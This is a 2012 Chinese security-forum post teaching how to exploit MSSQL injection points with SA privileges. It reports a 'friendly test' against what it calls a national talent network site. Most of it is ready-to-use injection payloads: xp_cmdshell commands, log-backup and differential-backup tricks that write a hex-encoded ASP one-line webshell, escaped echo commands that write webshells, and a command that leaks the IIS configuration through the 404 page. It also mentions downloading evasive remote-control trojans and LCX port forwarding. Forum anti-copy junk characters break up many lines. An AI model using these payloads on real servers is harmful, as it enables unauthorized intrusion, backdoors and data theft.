找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2262|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————5 l) b/ Y- X! C
# n: r# T6 a2 Z
* Y& c! p$ y( U- e
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。% Z8 s) X1 C" p! k7 `
) Y' k8 s2 O- I6 e" a2 ]
                                                                 4 u$ n2 P1 \' B2 V) G- G
                                                                 * \, g6 F( B' Q
                                                                  论坛: http://www.90team.net/* n) z2 p7 c. i# }$ l( m: B( @" g
1 y* j: k, ^8 A6 a/ t5 N. j( z0 K" E( v
. M- k7 k! B2 `) G
  J" ^0 k6 c0 H" u+ n8 ?
友情检测国家人才网8 f3 m: z) Y$ t9 b: O
% z2 x" ]) O( j

- P* i( w' B' s内容:MSSQL注入SA权限不显错模式下的入侵
5 O/ s  G2 Z" Y7 M) n5 B* J, I$ h

0 }, G/ K7 g( t; b2 j# l6 I4 f4 ?一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
+ e0 i" @) Q5 W: s$ D; J5 ]6 \$ g0 a
2 h7 K5 R1 s% V1 h/ i; a我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。& I! y4 w0 }9 E# e5 M. A

0 V5 h, h( w2 ?4 u) X! Z
4 s# _( C, Z- s& W1 W: Z9 S& G这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。& k6 N; N. }6 I5 z- \4 ~
4 J5 M) z9 E6 i' y% H0 s3 B/ `4 ?
思路:
2 Y( \+ O- B' t4 l5 V- q
: T1 ~5 x9 W" z& K. Z首先:- ^+ L# S) y' K

- }6 P" f) x' X: p: V$ Y通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
- h% q' k4 w! _
$ ]& [) h5 ^4 J/ f1.日志备份获得Webshell
  y9 f3 o- w/ n" q, m1 Q" v2 a) D4 D/ G# K' ^9 f
2.数据库差异备份获得Webshell
5 E; Y" z2 z" c2 ~9 o7 x, I& y/ u! t/ l7 v3 X
4.直接下载免杀远控木马。% P) c& ~6 `0 P% u+ R1 p  A4 m
6 E. v4 l. A$ r% z" ~2 Z; Z) b
5.直接下载LCX将服务器端口转发出来
! H& ]  P. S& n# A3 V
9 K4 |( F. c: P" i6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。- u; g3 v# v& o, I4 l5 N  X

6 q6 |2 U8 Q; v6 U3 V) ~
$ ?2 w2 I. D' s0 j1 @5 E' S
$ Z( s. L* I8 U- e( p在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
4 _& z% Q8 ]+ j% L7 d5 O- W+ D* ~, o+ @$ H- M
我直接演示后面一个方法
, J% N; M! p5 Z2 U; g( e' Y" J& e4 {* Y% z: B: M

3 u/ K6 M7 z" L1 B( N% }分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
0 w7 X: z9 Y3 |" ~  e) a1 X6 {
3 M: a2 P9 ^: c9 a  Y6 V9 e& g! \9 i% q& X+ `. J
6 D8 y8 ?9 ^9 ]$ j+ j
' y- ~# {& E$ p+ M1 D, m  {8 m
◆日志备份:) l/ q  M" r. W" Z/ u1 R- P) U
2 ]/ G: b6 ]3 m* n( R

' K: J- Y8 G( K: o. W& w4 U1. 进行初始备份
2 ?. `( G+ G7 u  S  h& J: C; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
7 K7 r  u% N: @& `3 z+ |7 J' o8 }7 J1 H* u+ @* y6 u. t( J
2. 插入数据3 ]6 a& ^: W" F, Y# ?# a
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--# O) \' f) t% f; O9 C" d* s! ?! ?
7 y/ ~  H. v, G% A! g2 y
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>% Y6 B; z; k) o5 l4 Z( S
  
0 M/ C( V3 C4 O3. 备份并获得文件,删除临时表
: U" s# t& n- Y! j;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
4 x7 t/ q$ Z# P2 d/ J
' w' t8 n/ P' W# m- i) a2 o& t* Y  c- z" F# z9 f1 x4 _& m
1 h. [0 x' V; @$ k1 |
◆数据库差异备份
' B9 [7 I: i' E; g3 g/ j  G( j8 d. L4 B6 X
(1. 进行差异备份准备工作
; ^" V% r& t4 i7 q% m
6 o) H9 H8 {  C2 c;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
7 H, }$ N# Q5 f* I* y( [1 M
2 _7 {3 C5 L! W. m: A/ K上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
- \* P! ~% [. H/ c3 s1 ?
6 r$ Z# A  v) j* {' }8 b6 b. `/ a
(2. 将数据写入到数据库
. V7 {- W5 P8 B8 K$ C4 I;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
6 F2 i7 n0 {& q2 u% s1 W+ W8 e: r$ o8 C  f* r
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
( T' Q; A: ~& @8 |2 y
0 O) W# x; u0 W5 @! q4 q% r& p7 h3. 备份数据库并清理临时文件
9 N% T! d! i) e  D  k
) u; X2 G) q5 q  M( q;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--  Q& \( R  ]( p# ?9 E" ^
4 v( V+ N6 O6 f& c) x  v
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
6 b8 D: c- ]% C2 p9 r( W5 G1 u- f, S6 w& L. j1 g

1 J  u7 N2 G2 o6 |- F0 F8 j- ^' ?, x  }3 l) u; t' \
用^转义字符来写ASP(一句话木马)文件的方法:   
7 n7 D( D' z2 S1 G  y4 \. U' x+ f9 U, d+ ?1 X9 d9 R6 i% f
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--3 }" h8 x) l$ [5 I8 B' K$ o
3 F) Y- q2 h9 D4 @; O6 }; e5 n. _
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp . P3 t7 r3 Z- W9 P5 Z+ x+ I; |6 @- l
5 M  p5 K; Q' E+ Q  p2 `
读取IIS配置信息获取web路径
5 X" u, s1 r( `- U- l% Z' ]" N
, D( s$ y$ k! [% ~) x$ D' {     + U+ ?7 `3 \1 W2 G" s% }3 \9 g* Y
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
  b, [& u3 S! Y/ r. L) n
1 _; T5 ?' I3 H$ v4 E7 Z+ i& x执行命令
  i9 u/ ?, g  @, E     9 [9 v: [) [5 `* h2 }. [) x3 W
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--, W/ y- d# ~# b
6 X8 d) P) H5 h% P  ~, ?* c
% P) L4 Q7 M6 M6 D: \
( l" E6 U+ X  s. Q  p" p* X

; Y7 I" w/ b5 L, Q8 ?3 I1 f' ~& W( S/ W/ v

9 J. ?+ `; M" U  u1 C9 ]' n
1 b6 h. O1 i8 p. J) F, t( n$ {! B
" t( q+ W2 g% t2 e, e
1 M; o) F5 U  J: T* b
1 P# Y8 U' W# z2 m, j
8 x0 M7 |8 C- N4 k: N8 c
3 r2 L% z+ B: J9 x. U  D7 u3 p. g

  m6 R" u# t2 u& ?9 S: N$ D" [* [  U$ @, R: R) }
3 b* T. ?. x, i& D4 c! w0 Z

5 V. O9 H" |/ z% a7 i" e: V/ V5 r0 e2 x5 I" B5 H: i
- s# o( k+ M1 Q% q; ~/ w- g

0 H) t' b. m# K, Y% I; a, @9 ^1 j! p0 K- q% E" x  m; t' `/ N
: p- Z& P, ^- p) E

& K3 J4 x/ E9 @/ H4 \/ U' K; n# i6 D) ?1 O( x' |
" y! ?  B9 c6 v2 D0 q6 H; S9 H8 y
* c% s/ ]7 d1 Y; ^7 s, y* X3 G3 I
7 \7 V! k8 s! e. y3 R! Z, h/ X
# V4 s, G& @8 I) f  p
' _% p; \1 Z2 I$ A5 H! D: q
' ~" X2 S& e7 L# L2 E' S
' K6 q  z) P7 |: ?  U$ ?

- H* ^# c$ C9 r6 j3 m: [8 u9 v
+ y" l2 t: ?  T1 R5 n7 p& m2 B) x4 |

' @6 \! L0 }' K3 e
- b; d+ r# ~+ f- d" _7 [! I2 M; L1 j. y. I/ }4 C
7 n. e9 d- u* e

" I/ ?/ U( S5 {9 V8 `1 E
% X3 t# `8 {- ?; k/ I$ p7 s4 M! n$ q+ R
" p* S* o% @# n
* s5 _/ w2 Y) V" j5 I

* T/ e" E9 C) R& T$ |) {4 |8 a% S8 |/ v7 C

9 W+ V% q6 f3 f" y* r- s3 u/ a* p2 K8 u& A% v

3 x/ H7 z; R- n9 n& |5 U% {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表